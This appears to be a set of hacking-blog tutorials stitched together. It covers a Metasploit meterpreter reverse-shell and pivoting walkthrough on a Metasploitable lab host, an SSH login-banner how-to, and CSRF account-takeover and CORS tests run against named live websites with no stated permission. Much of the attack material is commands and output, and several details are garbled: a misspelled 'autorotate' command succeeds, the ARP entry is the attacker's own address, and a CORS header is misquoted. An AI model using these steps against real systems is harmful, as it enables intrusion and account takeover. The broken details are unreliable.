We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.43.152
LHOST => 192.168.43.152
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler...

When we download the file onto the target, we provide appropriate permissions to the file via the chmod command, as shown in the following screenshot:

chmod 777 backdoor.elf




ls -la
total 129
drwxr-xr-x  21 root root  4096 Jul  9 16:18 .
drwxr-xr-x  21 root root  4096 Jul  9 16:18 ..
-rwxrwxrwx   1 root root   207 Jul  9 16:17 backdoor.elf
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  14 root root 13500 Jul  9 15:53 dev
drwxr-xr-x  94 root root  4096 Jul  9 16:19 etc
drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
....


./backdoor.elf 

Providing the 777 permission will grant all the relevant read, write, and execute permissions on the file. Execute the file, and now switch to the other terminal, which is running our exploit handler:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444 
[*] Sending stage (984904 bytes) to 192.168.43.120
[*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530

meterpreter > 

Mumma, we got it, we got the meterpreter shell acces to the target. Lets find some interesting information using the post exploitation modules:

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
meterpreter > ifconfig

Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.

meterpreter > 
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 08:00:27:67:67:30
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.43.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > 

Running the ifconfig command on the target, we see pretty interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems may reside. We run the arp command on the target and check if there are some systems already connected or were connected to the exploited system from the internal network, as shown in the following screenshot:

meterpreter > arp

ARP cache
=========

    IP address      MAC address        Interface
    ----------      -----------        ---------
    192.168.43.152  fc:01:7c:29:00:77

meterpreter > 

We can clearly see an additional system with IP address 192.168.43.120 on the internal network. Approaching the internal network, we need to set up pivoting on the exploited machine using the autoroute command.

meterpreter > run autoroute -p

[*] No routes have been added yet 
meterpreter > 



meterpreter > run autorotate -s 192.168.43.120 255.255.255.0

[*] Adding a route to 192.168.43.120/255.255.255.0...
[+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120 
[*] Use the -p option to list all active routes

meterpreter > run autorotate -p

Active Routing Table
====================

   Subnet            Netmask         Gateway
   ------            -------         -------
   192.168.43.120    255.255.255.0   Session 1 

meterpreter > 

The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.

Let us now put the meterpreter session in the background by using the background command as follows:

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > hosts

Hosts
=====

address          mac                 name      os_name      os_flavor     os_sp     purpose     info
comments 
-------          ---                 ----      ------        -----       ----       -----      ----
 ------
192.168.43.120   fc:01:7c:29:00:77   metasploitable  Linux                          Server
 


msf6 exploit(multi/handler) > 

Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:

msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) > 
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
RHOSTS => 192.168.43.0
msf6 auxiliary(scanner/portscan/tcp) > run

[*] 192.168.43.0:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > 
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:23 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:25 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:21 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:53 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:111 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:139 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:445 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:514 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:513 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:512 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:1099 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:1524 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:2049 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:2121 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:3632 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:5900 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6000 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6200 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6667 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6697 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:8009 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:8180 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:8787 - TCP OPEN
[*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > 

Running the port scan module will require us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg option will globally set RHOSTS value to 192.168.43.120 and thus eliminates the need to retype the set RHOSTS command again and again.

In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/http/http_version) > run

[+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) > 

Running the auxiliary module, we find that the service running on port 80 is the popular Apache 2.2.8 web server. Exploring the web, we find that the PHP version 5.2.4 is vulnerable and can allow an attacker to gain access over the target system.

Disclaimer

Display a ASCII Message After SSH Login

Sometimes when you want to provide remote access to your system via SSH, you want to display a customized message on the terminal for the remotely logged-in user. In this tutorial, I will show you how to display a custom ASCII text and text message upon SSH login to your Linux server.

Requirement

You need to have installed SSH

Let's Displaying a Message

For displaying a ASCII text or normal text in linux or any other distro ,you will to perform the following steps:

Step 1 :- First you need to open a MOTD or create a file on your system with the COMMAND shown below.

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nano /etc/motd
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$

and once this file is created or open (as you can see i have already this file in our linux system ), you can type in any messages or ASCII text as of your choice just like we did. After that, you can save this file and exit.

ASCII Creator - CLICK HERE

Step 2 :- Check your system IP

Step 3 :- Log into your machine through SSH to Display the message.

You need to log into your machine through SSH by executing the following command. You can either run this command on your own machine’s terminal or you can even use any other machine on the same network for serving the very same purpose.

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo su
KumarAtulJaiswal# ssh hackerboy@192.168.43.152
hackerboy@192.168.43.152's password: 
Linux KumarAtulJaiswal 5.10.0-kali8-amd64 #1 SMP Debian 5.10.40-1kali1 (2021-05-31) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

WELCOME  TO
██   ██  █████   ██████ ██   ██ ██ ███    ██  ██████      ████████ ██████  ██    ██ ████████ ██   ██ 
██   ██ ██   ██ ██      ██  ██  ██ ████   ██ ██              ██    ██   ██ ██    ██    ██    ██   ██ 
███████ ███████ ██      █████   ██ ██ ██  ██ ██   ███        ██    ██████  ██    ██    ██    ███████ 
██   ██ ██   ██ ██      ██  ██  ██ ██  ██ ██ ██    ██        ██    ██   ██ ██    ██    ██    ██   ██ 
██   ██ ██   ██  ██████ ██   ██ ██ ██   ████  ██████         ██    ██   ██  ██████     ██    ██   ██ 
                                                                                 www.hackingtruth.in 



                                                                                                     
You have new mail.
Last login: Sun Jul 11 20:07:56 2021 from 192.168.43.152
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

Disclaimer

What is CSRF

CSRF is stand for cross site request forgery and is a malicious exploit of a website basically attacker use for this to exploit and account takeover where unauthorized commands are submitted from a user that the web application trusts. CSRF Account TakeOver on Live Website
 

How CSRF Works?

Attacker sends a link with email and password to the client(as a victim of attacker) and lets say by phishing

Attacker sends a link which contains the request of a email & password of attacker. lets suppose that link is for www.hackingtruthbank.in then as soon as client which means the victim or user clicks on that links his details will get updated to the hackingtruthbank.in by the server. Server accept the new credentails which is given by client but the client unknowlingly clicked that specific links which contains is that two things so the first thing is a new email and new password which got automatically updated.

Now, the attacker logins with new credentials and successfully does ATO (account takeover) of client. so this how CSRF works. CSRF is a very dangerous vulnerability and can leak to successfully ATO and sometimes in this case the client is unable to login to his own account because you know very well what happend with his account But why because his account is now accessable by the new creds by the attacker.

How are we going to test for CSRF?

As you can see how are we going to test for csrf vulnerability in any website whenever you doing hunting for penetration testing.

He need to make two accounts the first account lets say a victim account and the second one is attacker account now what the attacker is going to do is?

The attacker is going to generate a link let's say the email and password for change then he is going to send that malicious link with updated a email and password account details to the victim to the first account now is the victim interact with thats links and click on that links then he have to check the data it has been updated into the profile or not so let's say the attackers link which contans the first new change functionality which means the name should change to the attacker.

When the victims click on that links and his profile his name first name changes is true from victim to attacker that's means we have successfully achive CSRF or in another dangerous case If the attacker send the links with email attacker@gmail.com and password attacker 12345 and if that gets change them it has account takeover vulnerability.

we will do an ATO either changing email or password or both getting the complete access of the account and making a parmanent log out of the user is consider a vulnerability of extreme savirity so in this case your bug can go to PON savirity.

How can we achieve CSRF to Account Takeover?

Now i am going to quickly signup on this website first.

I have created a account onto this platform and i have got an email we have registered successfully and then we clicked on links whereas we can see that RESET YOUR PASSWORD (on your mail). After clicking on that link we redirect on azafashion.com.

As you can see in this user section there are lot of options available but we will be use a profile section.

When i have clicked on account details here are accounts details as can be seen. This is temporary generated name and at all then i am going to change name of this account and the name is victim account.

Now what i am going to do is. I am going to make attacker account also. So i open a new private window with azafashion.com and create a new account of attacker whereas i change a name like attacker.

But in this let me just capture the request before saving a username.

This is the POST request which is going to the server for changing the profile detail as you can see the user first name is return attacker so the attacker comes to know the website is vulnerable to CSRF we a making a POC (proof of concept) through which he is going to change the details of victims.

Then we generate a CSRF poc with enangement tools in burp suite. so you can see POC has been generated and leave the previous request because our work is done.

Then we just copy this all and paste it with a new file called azafashioncsrf.html

so there is name attacker then let me just change or modify the name attacker to attackerCSRF and as you can see this mail ID is belong to attacker account (see the above section i told you in private window i am creating another new account by attacking with MAIL ID).

So after open it in our browser as you can see there's only submit button appear here.

So as you can see this is a victim browser and not a private window and we click on this button as you can see the status is 200.

then when(victim) we try to reload to his account and the details over will be changed here. So the name field has been changed there is attacker CSRF take over as well as email address has been changed. which means that through the attackers request of edit profile the details of the victim got changed and this is the successful CSRF.

Mitigation

CSRF vulnerabilities can still occur on login forms where the user is not authenticated, but the impact and risk is different. ... Login CSRF can be mitigated by creating pre-sessions (sessions before a user is authenticated) and including tokens in login form.


Use captchas and CSRF-tokens for be sure that the victim is changing the datas knowing that.

Report

Disclaimer

What is CORS? 

Cross-Origin Resource Sharing

W3C working draft that defines how the browser and server must communicate when accessing sources across origins. CORS Cross Origin Resource Sharing Vulnerability on Live Website

Implemented via HTTP headers that servers set and browsers enforce.

 

Can be categoriezed into 

 
 - Simple Requests
 - Requests that need a Prelight
 

Working Process

credit for this image hacktify

Three Important Cases for CORS

We are going to see important cases for identify a CORS vulnerability. This is the best which is the best case for this vulnerability.

As you can see under the left side it is the request and right side it is the response if we try to add our header into the request and header is origin And let say we type any.com which is attacker.com and if this attacker.com get reflected into the response in this two headers. Access-Control-Allow-Origin attacker.com and Access-Control-Allow-Credentials true then this is vulnerable which is the best test best case for us.

so we have understood the first and the best test case is that whenever we try to supply attacker.com into the origin into the request if we get the attackr.com as it is into the response then it is the best test case for the attacks.

So now let's see the second best test case for for our exploitation.In the request it is attacker.com. In the origin header and in the response if it shows something like null in Access-Control-Allow-Origin and Access-Control-Allow-Credentials if we seen True then also it is the best test case for our attack. So I hope you guys understood the first and second test case.

 
In the first test case we got attacker.com as it is by passing it in the request we got as into the request and in the second test case we passed at the attacker.com and in the response Null. Which also means it is exploitable. 

               
                                                

So, let's see the last test case which is the case 3 which is a bad implementation but not exploitable test case we cannot exploit this test case. so, in the request if attacker.com is passed into a header that is origin and in the response if we get * (star) in access-control-allow-origin if we get a * (star) then it is not exploitable this test case is not exploitable. we cannot exploit this so to conclude the first to test cases we can exploit in which we are able to see a reflection of the origin into the response that is a attacker.com that is the first test case in the second test case if you are able to see Null then it is also exploitable but if you're getting a * (star) into the response it is not acceptable I hope you guys understood this and now it is the practical time let see the practical for this.

Practical

I will get a request into my burp suite after getting the request i am going to this request to the repeater so that i can use this request again and again. Now in near what i am doing to do is!! I am going to add a new header and header is Origin as we saw into our test cases. after adding here Origin: https://hackingtruth.in and i am going hit go.

If you look closely in the response tab there is something which is generated, here is link and the link which is i am getting one more End-point zinghr.com (/wp-json/).

What if try to send a request to add this point GET /wp-json/ HTTP/1.1 with these Origin.

So this time when i did go. Vola!! as you can see this time the zinghr.com server has trusted this attacker server that is hackingtruth.in and is ready to exchange the data between in the server. So this website is vulnerable with CORS.



Access-Control-Allow-Origin: https://hackingtruth.in
Access-control-allow-origin: True
 
which is reflected.

Manually

Lets do this how to manualy exploit this issue with curl command and those who don't know what is curl basically curl is a simple utility which is responsible to sending the request to any target and getting a response.

curl "https://zinghr.com/wp-json/" -I 

 

-I - For header that i only want to see response header instead of whole page source. There is something which is generated, here is link and the link which is i am getting one more End-point zinghr.com (/wp-json/)

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ curl "https://zinghr.com/wp-json/" -I                     
HTTP/2 200 
date: Sun, 04 Jul 2021 19:13:49 GMT
server: Apache
x-powered-by: PHP/7.3.26
x-robots-tag: noindex
link: <https://www.zinghr.com/wp-json/>; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
allow: GET
vary: User-Agent
content-type: application/json; charset=UTF-8

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

link: <https://www.zinghr.com/wp-json/>; rel="https://api.w.org/"

So, now we add a new header called origin and now i am going to hit enter and check for verify this origin is trusted by zinghr.com server or not? But if this is trusted then it back reflected into the response header.

curl "https://zinghr.com/wp-json/" -I -H Origin: https://hackingtruth.in

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ curl "https://zinghr.com/wp-json/" -I -H Origin:https://hackingtruth.in
HTTP/2 200 
date: Sun, 04 Jul 2021 19:19:44 GMT
server: Apache
x-powered-by: PHP/7.3.26
x-robots-tag: noindex
link: <https://www.zinghr.com/wp-json/>; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
allow: GET
access-control-allow-origin: https://hackingtruth.in
access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
access-control-allow-credentials: true
vary: Origin,User-Agent
content-type: application/json; charset=UTF-8

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

Access-Control-Allow-Origin: https://hackingtruth.in
Access-control-allow-origin: True
 
which is reflected.


As you can see our best test case that is the first test case is been satisfied over here and we are able to get our attacker.com reflected into the response. so i hope you guys understood. How to find this vulnerability using burp suite as well as curl.

CORS Mitigation

1) SOP! Same Origin Policy
2) Do not trust any aribitary origin and communication with it!




what are the mitigations for CORS.

1) So the first and the best mitigations for CORS is SOP the same origin policy. so this policy means this policy means that the web site or the web application should not transfer any kind of data to any other web application so it should only communicate and transfer the data with the same origin for same website.


2) Do not trust any arbitrary origin and communicate with that if any web application is getting any origin header as a request that should not trust that arbitrary header and give out sensitive information basically whenever attacker tries to do a reflective origin based CORS the server should discard that I should not trusted and should not give out the response to that server. Secondly if a suffix or prefix based cause exploitation is performed the server should do proper validation not just limited to checking the hostname into the origin we have already seen if the server is misconfigured and just check for the name into the origin header and takes decisions based on that which is dangerous can lead to CORS exploitation. So do not trust any arbitrary origin and communicate with it is the best mitigation for CORS. so I hope you understood the mitigation for CORS.

Disclaimer